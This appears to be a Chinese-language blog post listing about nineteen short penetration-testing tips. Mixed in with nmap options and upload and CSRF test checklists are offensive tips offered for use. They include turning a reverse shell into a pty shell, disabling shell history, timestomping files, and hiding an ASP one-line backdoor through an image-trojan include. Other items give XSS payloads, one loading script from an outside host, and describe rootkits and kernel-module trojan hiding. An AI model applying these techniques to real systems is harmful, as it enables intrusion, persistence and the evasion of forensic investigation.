滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧，旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量，每一篇為20條左右的滲透小記。

[[108761]]

1.提權(quán)后進(jìn)入遠(yuǎn)程桌面發(fā)現(xiàn) desktop locker(桌面鎖)

解決方法：

ctrl+shift+esc 一直按會(huì)出現(xiàn)資源管理器，鼠標(biāo)結(jié)束desktop locker即可

2.3389低權(quán)限用戶提權(quán)(這個(gè)情況似乎比較少見?)的時(shí)候或者日常滲透用軟件的時(shí)候可以

subst x: D:\XXX 用命令創(chuàng)建 X盤符 
遠(yuǎn)程桌面連接器-本地資源-詳細(xì)信息 -驅(qū)動(dòng)器-勾選新增的X盤符

可以把本地驅(qū)動(dòng)器映射到遠(yuǎn)程3389服務(wù)器上的X盤，放上常用提權(quán)工具方便滲透。

3.Rootkits：

Rootkits是linux/unix獲取root權(quán)限之后使得攻擊者可以隱藏自己的蹤跡和保留root訪問權(quán)限的神器，通常攻擊者使用 rootkit的檢查系統(tǒng)查看是否有其他的用戶登錄，如果只有自己，攻擊者就開始著手清理日志中的有關(guān)信息，通過rootkit的嗅探器還可以獲得其他系統(tǒng)的用戶和密碼!

目前常用的有：t0rn /mafix/enyelkm 等等。

Rootkits通常分為：應(yīng)用級(jí)別—內(nèi)核級(jí)別—-硬件級(jí)別，早期的是rootkit主要為應(yīng)用級(jí)rootkit通過替換login、ps、ls、 netstat等系統(tǒng)工具或修改.rhosts等系統(tǒng)配置文件等實(shí)現(xiàn)隱藏后門，硬件級(jí)RootKits主要是指Bios Rootkits，能夠在系統(tǒng)加載前獲得控制權(quán)，通過向磁盤中寫入文件，再由引導(dǎo)程序加載該文件重新獲得控制權(quán)也可以采用虛擬機(jī)技術(shù)，使整個(gè)操作系統(tǒng)運(yùn)行在rootkit掌握之中，目前常見的rootkit是內(nèi)核級(jí)rootkit，通過直接修改內(nèi)核來添加隱藏代碼實(shí)現(xiàn)控制系統(tǒng)的功能。

最為簡(jiǎn)單實(shí)用的應(yīng)用級(jí)別Rootkit是通過將添加過提權(quán)代碼的命令替換系統(tǒng)中原始的命令來實(shí)現(xiàn)功能的，并且一般提供清理工具刪除wtmp、 utmp、lastlog等日志文件中自己的行蹤，并且復(fù)雜點(diǎn)的rootkit還可以向攻擊者提供telnel、shell和finger等服務(wù)。

4.LKM隱藏技術(shù)：

LKM就是可裝載內(nèi)核模塊(Loadable Kernel Modules)。這些模塊本來是Linux系統(tǒng)用于擴(kuò)展其功能的。

木馬最大的特性就是隱蔽性，不能輕易讓人察覺，所以隱藏木馬相關(guān)信息是關(guān)鍵的因素。對(duì)于Linux操作系統(tǒng)來說，主要有靜態(tài)隱藏和動(dòng)態(tài)隱藏兩個(gè)標(biāo)準(zhǔn)。

由于Linux本身的安全性，想利用外殼程序隱藏木馬文件和進(jìn)程不可能實(shí)現(xiàn)，所以就借要通過修改Linux內(nèi)核的系統(tǒng)調(diào)用來隱藏木馬相關(guān)信息，這就是LKM技術(shù)。

5.Bootkit：Bootkit是更高級(jí)的Rootkit,該概念最早于2005年被eEye Digital公司在他們的“BootRoot”項(xiàng)目中提及。它主要利用其內(nèi)核準(zhǔn)入和開機(jī)過程的隱身技術(shù)，當(dāng)在功能上并無異于Rootkit。他們的不同主要表現(xiàn)在獲取準(zhǔn)入的方式上。傳統(tǒng)的rootkit利用系統(tǒng)啟動(dòng)時(shí)提升權(quán)限。而Bootkit是被安置在外設(shè)的主引導(dǎo)扇區(qū)和駐留在整個(gè)系統(tǒng)的啟動(dòng)過程。

Bootkit的引導(dǎo)扇區(qū)代碼總是在ROM BIOS執(zhí)行后主引導(dǎo)記錄被載入前劫持系統(tǒng)啟動(dòng)程序。一旦被載入到內(nèi)存，代碼便執(zhí)行中斷指令，也就是俗稱的HOOK掛鉤。它掛接到INT 13指示后續(xù)扇區(qū)讀取其信息。這個(gè)過程完成后，Bootkit試圖改變引導(dǎo)過程的結(jié)構(gòu)和操作邏輯流程。

6.用nst的反彈后門連上nc后不能su交互，報(bào)錯(cuò)如下：

standard in must be a tty

解決方法：

python -c ’import pty; pty.spawn(“/bin/sh”)’

得到shell就可以su進(jìn)行交互了。

7.history不記錄：

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

8、自己嘗試最短的引入外部腳本的xss payload(28個(gè)字符):

<script src=http://e1v.cn/pj

9、有文章稱

<script src=//xxx.xxx/a.js></script>

也可以插入，但是實(shí)測(cè)證明，不是每個(gè)瀏覽器都支持沒有http：的插入。要有效可靠的插入，還是參考上一條的插入方法。

10、實(shí)在要短得不行的，那就分開來插吧：

<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>

11、C類IP地址：C類數(shù)字相同的IP地址，通常是同一臺(tái)服務(wù)器或是處于同一網(wǎng)絡(luò)上的服務(wù)器。所以如果兩個(gè)網(wǎng)站IP地址前三個(gè)數(shù)字相同，如198.197.196.195和198.197.196.194，搜索引擎會(huì)認(rèn)為這兩個(gè)網(wǎng)站之間是有一定關(guān)系的，很可能在同一架服務(wù)器上。

12、URL靜態(tài)化：通過URL重寫技術(shù)，將動(dòng)態(tài)URL轉(zhuǎn)化為靜態(tài)URL。在LAMP主機(jī)上，URL重寫通常是通過mod_rewrite模塊;在windows主機(jī)上，通常是通過ISAPI Rewrite或是 IIS Rewrite模塊。

13、在nmap目錄下有很多掃描腳本，可以實(shí)現(xiàn)很多智能化的功能，具體在/nmap/scripts這個(gè)目錄下：使用方法：

nmap -P0 --script= smb-check-vulns 192.168.XXX.XX

14、常用的nmap掃描類型參數(shù)主要有：

-sT TCP connect掃描

-sS TCP SYN掃描

-sF -sX -sN 通過設(shè)置一些特殊的標(biāo)記位來避開防火墻的檢測(cè)

-sP 利用ping來探測(cè)主機(jī)是否存活

-sU 探測(cè)主機(jī)開放了哪些UDP端口

-sA TCP ACK掃描

-sV 探測(cè)端口上面運(yùn)行的詳細(xì)信息

15、常用的nmap掃描選項(xiàng)有：

-O 探測(cè)主機(jī)操作系統(tǒng)

-A 比較高級(jí)的主機(jī)旗標(biāo)探測(cè)

-Pn 不利用ping命令來探測(cè)主機(jī)是否存活

-F 快速掃描模式

-p<端口范圍>

16、使用icyfox-time.exe修改文件的時(shí)間屬性：

icyfox-time.exe "e:\web\yuan.asp" e:\web\gai.asp

注意:第一個(gè)文件路徑需要用雙引號(hào),第二個(gè)不需要。這樣就把”e:\web\gai.asp”這個(gè)文件的時(shí)間改為和”e:\web\yuan.asp”文件一樣啦。

17、更加隱蔽的asp網(wǎng)站留后門的方法：

上傳一只一句話圖片馬，具體制作方法請(qǐng)參見“圖種技術(shù)”;然后在你要插入一句話的頁面里插入一下代碼語句：

<!--#include file="圖片馬路徑"-->

18、關(guān)于上傳漏洞的檢測(cè)步驟：

(1).上傳文件是否有格式限制,是否可以上傳exe文件;

(2).上傳文件是否有大小限制,上傳太大的文件是否導(dǎo)致異常錯(cuò)誤,上傳0K的文件是否會(huì)導(dǎo)致異常錯(cuò)誤,上傳并不存在的文件是否會(huì)導(dǎo)致異常錯(cuò)誤;

(3).通過修改擴(kuò)展名的方式是否可以繞過格式限制，是否可以通過壓包方式繞過格式限制;

(4).是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大文件拆分上傳是否會(huì)出現(xiàn)異常錯(cuò)誤。

(5).上傳文件大小大于本地剩余空間大小，是否會(huì)出現(xiàn)異常錯(cuò)誤。

(6).關(guān)于上傳是否成功的判斷。上傳過程中，中斷。程序是否判斷上傳是否成功。

(7).對(duì)于文件名中帶有中文字符，特殊字符等的文件上傳。

19、跨站請(qǐng)求偽造(CSRF)

(1).同個(gè)瀏覽器打開兩個(gè)頁面，一個(gè)頁面權(quán)限失效后，另一個(gè)頁面是否可操作成功。

(2).當(dāng)頁面沒有驗(yàn)證碼時(shí)，查看頁面源代碼，查是是否有token。如果頁面完全是展示頁面，是不會(huì)有token的。